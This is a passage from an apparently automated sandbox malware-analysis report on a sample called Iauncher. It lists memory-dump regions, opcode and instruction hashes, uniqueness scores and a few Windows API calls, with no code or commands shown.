                                                                                                                                                                              • Opcode Fuzzy Hash: 6fc6b9a6514a6d5c7dd711f8987fab13207a7c6320eb802d395034f4aab3c43f
                                                                                                                                                                              • Instruction Fuzzy Hash: A882E335D00A298FCB22DF64CC54BDABBB2FF49301F0591E9E508AB261DB719A95CF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 04a5cfd5ab088d3470ff6a70b6fd6a20b715c11528a61890d7ce4375a20f191b
                                                                                                                                                                              • Instruction ID: 5a4760b153a75306ce053d08b739cb29e1f6492d9e6105b633c3327e0c0244a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 04a5cfd5ab088d3470ff6a70b6fd6a20b715c11528a61890d7ce4375a20f191b
                                                                                                                                                                              • Instruction Fuzzy Hash: 0932C674E01219CFDB64CF69D994B9EBBB2FB88301F1091A9E819A7394DB345E81CF50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b3eab052daf4638dbebdb42c5f50043018c0d46fa3e1111766734e68ce1ef981
                                                                                                                                                                              • Instruction ID: cd9fbd834144523c6479f3261eab8d43fd207503c079d78be893dcf286760cee
                                                                                                                                                                              • Opcode Fuzzy Hash: b3eab052daf4638dbebdb42c5f50043018c0d46fa3e1111766734e68ce1ef981
                                                                                                                                                                              • Instruction Fuzzy Hash: B0121574E14129CBDB14DFA5C994BAEBBB1FB49340F1094A6E80AB7395D7309D81CFA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: fe101dc199cdc81b74abd78df8e712cfbc088c916e7092db1cc8c61649fa186f
                                                                                                                                                                              • Instruction ID: a36594988089561eb60c6ba53d0b9b54da151ff9f4e220f57bdf95e6433eac77
                                                                                                                                                                              • Opcode Fuzzy Hash: fe101dc199cdc81b74abd78df8e712cfbc088c916e7092db1cc8c61649fa186f
                                                                                                                                                                              • Instruction Fuzzy Hash: D0221675C00219DFCF11EFA4D854AEDBBB5FF59300F1096AAE509AB260EB309A95DF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: be04a3e0cd2699638846345bedc0d381729e9cef726f7ac8d93758aa43c54d88
                                                                                                                                                                              • Instruction ID: 5609fea3457db5e841e53e1a359f02f7b86b5d9655905a06481b1a24b41b4783
                                                                                                                                                                              • Opcode Fuzzy Hash: be04a3e0cd2699638846345bedc0d381729e9cef726f7ac8d93758aa43c54d88
                                                                                                                                                                              • Instruction Fuzzy Hash: 46120535901628DFDB26DF64C848AD9BBB6FF46300F0591E9E50CAB261DB71AB94CF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 49d0258f9db37e1cdd5fef3774d7f63c3a1bf107ccbaa37394c3c5cdc50eb35a
                                                                                                                                                                              • Instruction ID: 61cb64da7f519247b716cdd2b76e2dc55430a4a8d6bc5358621f73cb35fba9eb
                                                                                                                                                                              • Opcode Fuzzy Hash: 49d0258f9db37e1cdd5fef3774d7f63c3a1bf107ccbaa37394c3c5cdc50eb35a
                                                                                                                                                                              • Instruction Fuzzy Hash: DA121735D10219DEDB10EFA4C844BD9BBB1FF9A300F51869AE5097B260EB70AAD5CF41
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: be20b580956bdb7deb8b7606a7956f1487c7891ce888269fd24176175887d080
                                                                                                                                                                              • Instruction ID: 938a624e4fdaa144da6d62d01c1d3bda3743dd2c8020cfceb9942e664f2db816
                                                                                                                                                                              • Opcode Fuzzy Hash: be20b580956bdb7deb8b7606a7956f1487c7891ce888269fd24176175887d080
                                                                                                                                                                              • Instruction Fuzzy Hash: 06021835D10219DFDB11EFA4C844BD9BBB2FF9A300F51829AE5096B260EB709AD5CF41
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e8020f73ef69ddc5ac78efc0f55a944bc284418f81c08eafbf7e4292513f3722
                                                                                                                                                                              • Instruction ID: e3c034020ec345a671983a74afc45de18d929b8bbd9b93dff4dd9ce16f3def2b
                                                                                                                                                                              • Opcode Fuzzy Hash: e8020f73ef69ddc5ac78efc0f55a944bc284418f81c08eafbf7e4292513f3722
                                                                                                                                                                              • Instruction Fuzzy Hash: 13D141B0A00305DFEB14DFA5C848BAEBBF1BF45304F19855AE409AB365DB70E949DB81
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b97da0ec2d873ea33ce3e27abbf29f53976cba5494b2ad683ec10adbf5c9bec4
                                                                                                                                                                              • Instruction ID: 69c6dd8eb372ed6f1f1b143ebfe23af22ba86c6c2fc3f8aa1bcea1a53fc0e86d
                                                                                                                                                                              • Opcode Fuzzy Hash: b97da0ec2d873ea33ce3e27abbf29f53976cba5494b2ad683ec10adbf5c9bec4
                                                                                                                                                                              • Instruction Fuzzy Hash: 80E1E735900229DFEB10DF68C844B99FBB2FF4A300F0196E9E54DA7261DB309A94DF52
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d8871c540d8793d37c07e5823fb6914c9a298a4d2cc4f07d157fc08565444f37
                                                                                                                                                                              • Instruction ID: 35c5b2f17dd24b5d4038546fbf01e234d6dea0a347c06e1011732bf677266497
                                                                                                                                                                              • Opcode Fuzzy Hash: d8871c540d8793d37c07e5823fb6914c9a298a4d2cc4f07d157fc08565444f37
                                                                                                                                                                              • Instruction Fuzzy Hash: F9C13971E002189FEB15CF65D880BDDBBB2BF88304F14C9AAD449AB255DBB0DA85CF51
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 204141b29e5957763578ba4c990b2e80a7ad36f3315a159aa30fca2c907bfda5
                                                                                                                                                                              • Instruction ID: 366dfacd378bb3864b5747e5a79ec005e206537b4c7eca219817b74a4022d00f
                                                                                                                                                                              • Opcode Fuzzy Hash: 204141b29e5957763578ba4c990b2e80a7ad36f3315a159aa30fca2c907bfda5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5C512235E112189FEB048FA9C4587FEBBF4AF49346F046469E405A72D0DB798A84CB94
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4f60534b488c108c10e95f78508ff01889a08ade423c8e4317eb963314063176
                                                                                                                                                                              • Instruction ID: b0ecd6b15e1109fd8f86cd7a84eeac68c81e1f7f401cc60aeb70fd1b70372e99
                                                                                                                                                                              • Opcode Fuzzy Hash: 4f60534b488c108c10e95f78508ff01889a08ade423c8e4317eb963314063176
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A41D375E012189FDF04EFE5D9549EDFBB6BF8A300F10A02AD405BB264DB705946DB84
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E041C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                                              • Opcode ID: 0451b6856ec5646e8518cae83853326f7a16f7a31b3d1a340333cbc8054517a4
                                                                                                                                                                              • Instruction ID: d400ad1d961ef92ce34e2c7f2c9cbe93944884de7a9f8f9c5d71b1bbbdf785e2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0451b6856ec5646e8518cae83853326f7a16f7a31b3d1a340333cbc8054517a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 8551C4B1D003199FDB14CF99C984ADEBBF5FF48314F24822AE919AB250D770A885CF91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E041C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                                              • Opcode ID: 2698e3533fd45ad7b663518aaae366ad75bdd0cf876322a9e9d349841da7848c
                                                                                                                                                                              • Instruction ID: 720c6060b20f2246b50f3a6712a3a4f5b832abd5b37479399284388aa54a061d
                                                                                                                                                                              • Opcode Fuzzy Hash: 2698e3533fd45ad7b663518aaae366ad75bdd0cf876322a9e9d349841da7848c
                                                                                                                                                                              • Instruction Fuzzy Hash: F451E3B1D00319DFDF14CF99D984ADEBBB1BF48314F24822AE919AB250D774A885CF91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00B67469
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Create
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                              • Opcode ID: f83f4d6d99157a19e0c0283754e231caebb3974a2ca4b978ee43199c0c83bc0d
                                                                                                                                                                              • Instruction ID: d830fdba7953563cb268d9263dcc975cc627819961434fca2a97b87caa9d42e8
                                                                                                                                                                              • Opcode Fuzzy Hash: f83f4d6d99157a19e0c0283754e231caebb3974a2ca4b978ee43199c0c83bc0d
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C41D2B0C04719CBDB24DFA9C848BDEBBF5BF48314F20816AD419AB251DB75694ACF90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04E06731
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallProcWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2714655100-0
                                                                                                                                                                              • Opcode ID: 74e0b4b61cd36080319b7e6817efbe759c493014fffd706bfa9c5453982a36ea
                                                                                                                                                                              • Instruction ID: e6b674b9ac7c11cef8e0e7a9b87a7dec2dad80e297622f14d7e3877ee4c60d18
                                                                                                                                                                              • Opcode Fuzzy Hash: 74e0b4b61cd36080319b7e6817efbe759c493014fffd706bfa9c5453982a36ea
                                                                                                                                                                              • Instruction Fuzzy Hash: DF4128B8900305DFDB14CF99C488BAABBF5FF88314F24C499D519AB361D774A881CBA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00B67469
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Create
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                              • Opcode ID: 2b664893fe61349252d4c55eca969689d7cc1e4e87639f43a8ec9b2c8168fc61
                                                                                                                                                                              • Instruction ID: c4073756fc383d2ada4a4caaa9715669df22ba10ccd93e284ae62a1200b54a2c
                                                                                                                                                                              • Opcode Fuzzy Hash: 2b664893fe61349252d4c55eca969689d7cc1e4e87639f43a8ec9b2c8168fc61
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C41C2B0C04719CBDB24DFA9C844B9EBBF5BF48304F2080AAD409AB251DB756949CF90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                                                              • Opcode ID: 88ba222a8458378749563473d3424ab829a5276b5fabf50496acdfadebb2dee5
                                                                                                                                                                              • Instruction ID: c2ac902d5774faa1b4b7d0c1b780e50c7e779c8d67cee236804a4da9d50e5694
                                                                                                                                                                              • Opcode Fuzzy Hash: 88ba222a8458378749563473d3424ab829a5276b5fabf50496acdfadebb2dee5
                                                                                                                                                                              • Instruction Fuzzy Hash: 523189B29043489FDB02DFA9C804AEEBFF8FF09310F14849AE954A7261C3359954DFA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 05CB126A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                              • Opcode ID: 55d4b32f74f304c70d61b7f4700df57fc6ab88466dd01704277c23faca6703ad
                                                                                                                                                                              • Instruction ID: bb8157674bfdcebbf7105ae111f71a8bb6df720ab7b961d046c5892c0cbec4a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 55d4b32f74f304c70d61b7f4700df57fc6ab88466dd01704277c23faca6703ad
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C2157B68043498FDB14CF9AC845BDEBBF4EF48320F14846ED858A7252C778A546CF65
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassInfoW.USER32(?,00000000), ref: 05CB135C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassInfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3534257612-0
                                                                                                                                                                              • Opcode ID: 3b18b3691972cfb5d3f4a754c8b2a5df6e3e73b62fe4f42187601282dfd43319
                                                                                                                                                                              • Instruction ID: 763a7c7a72c02463c997795a0f2e581897e6934fb621798db0216f28a1120d59
                                                                                                                                                                              • Opcode Fuzzy Hash: 3b18b3691972cfb5d3f4a754c8b2a5df6e3e73b62fe4f42187601282dfd43319
                                                                                                                                                                              • Instruction Fuzzy Hash: 5C2125B1D016098FEB04CF9AC8806DAFBF0BF88314F28856ED418A7711E3759906CB65
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6FA4E,?,?,?,?,?), ref: 00B6FB0F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                              • Opcode ID: b9d791422ec58b987a75c8e203ed773d448d0304cae4eae9b1e0086a2d08e3ae
                                                                                                                                                                              • Instruction ID: fed70d4e3cdf190769b110ff48b428b42841049873aab3b3f0f2c8032b5e95a3
                                                                                                                                                                              • Opcode Fuzzy Hash: b9d791422ec58b987a75c8e203ed773d448d0304cae4eae9b1e0086a2d08e3ae
                                                                                                                                                                              • Instruction Fuzzy Hash: 4521E5B5D002499FDB10CF9AD884AEEBBF4FB48310F14805AE918A3350D778A954CFA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassInfoW.USER32(?,00000000), ref: 05CB135C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassInfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3534257612-0
                                                                                                                                                                              • Opcode ID: 3ea7c3fc908b10b221f925b28fa5cf24982f96bdd7d577b7a2ac925766cddced
                                                                                                                                                                              • Instruction ID: 7957e8b37b6d42834529d9e1cd069c2bc7948a86a0666a311794f9a83d946a8e
                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea7c3fc908b10b221f925b28fa5cf24982f96bdd7d577b7a2ac925766cddced
                                                                                                                                                                              • Instruction Fuzzy Hash: 282137B1D013098FDB14CF9AC884ADEFBF8FB48320F14852EE819A3640D378A904CB64
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassInfoW.USER32(?,00000000), ref: 05CB135C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassInfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3534257612-0
                                                                                                                                                                              • Opcode ID: fe30ef9731bcb1ae78160359239b61a4b3b0861718b217bb2cb3e8f012fde03a
                                                                                                                                                                              • Instruction ID: 258bd4a59a44be4b81b81a31475e0b8bb487655883f3c598ba6b489da6317c47
                                                                                                                                                                              • Opcode Fuzzy Hash: fe30ef9731bcb1ae78160359239b61a4b3b0861718b217bb2cb3e8f012fde03a
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A2115B1D017098FDB14CF9AD884ADEFBF4FB48320F14852ED819A3640D774A944CBA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05CBB57A,?,?,?,?,?), ref: 05CBB61F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                                                              • Opcode ID: da39688c8620bf9e70851721508f5f0e8f4cd2773e55b815ce5cf41adb8e599a
                                                                                                                                                                              • Instruction ID: ed491019a7df7c40e8959be850ec23e083844d84bf743308a98e9fcbb78131e2
                                                                                                                                                                              • Opcode Fuzzy Hash: da39688c8620bf9e70851721508f5f0e8f4cd2773e55b815ce5cf41adb8e599a
                                                                                                                                                                              • Instruction Fuzzy Hash: A71156B180034D9FDB10CF9AC844BEEBFF8EB48320F14841AE955A3250C375A954DFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B6D881,00000800,00000000,00000000), ref: 00B6DA92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                              • Opcode ID: afcddee40a6b56f3869447001fc63ce20c806d5eb7ad046476df281be5fb8c58
                                                                                                                                                                              • Instruction ID: be58bbff8ecce9a4e9a3c82b18ab4b4d5ff298982e3be0ba97883d40a3327a59
                                                                                                                                                                              • Opcode Fuzzy Hash: afcddee40a6b56f3869447001fc63ce20c806d5eb7ad046476df281be5fb8c58
                                                                                                                                                                              • Instruction Fuzzy Hash: E51144B6D043488FDB10CF9AC444ADEFBF4EB48310F10846EE919A7200C379A944CFA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 05CB126A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                              • Opcode ID: 662d8f626c4f3ac8cb59e244805381e7be19e82a03c2d88ff90e4498b718eb81
                                                                                                                                                                              • Instruction ID: e0fec859cd40090d0a02deb70a883de431e40dd06db3cadbf376d2d3631deb72
                                                                                                                                                                              • Opcode Fuzzy Hash: 662d8f626c4f3ac8cb59e244805381e7be19e82a03c2d88ff90e4498b718eb81
                                                                                                                                                                              • Instruction Fuzzy Hash: 291112B6C002098FDB14CF9AC844BDEFBF4EB88320F14842AD859A3240D778A645CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
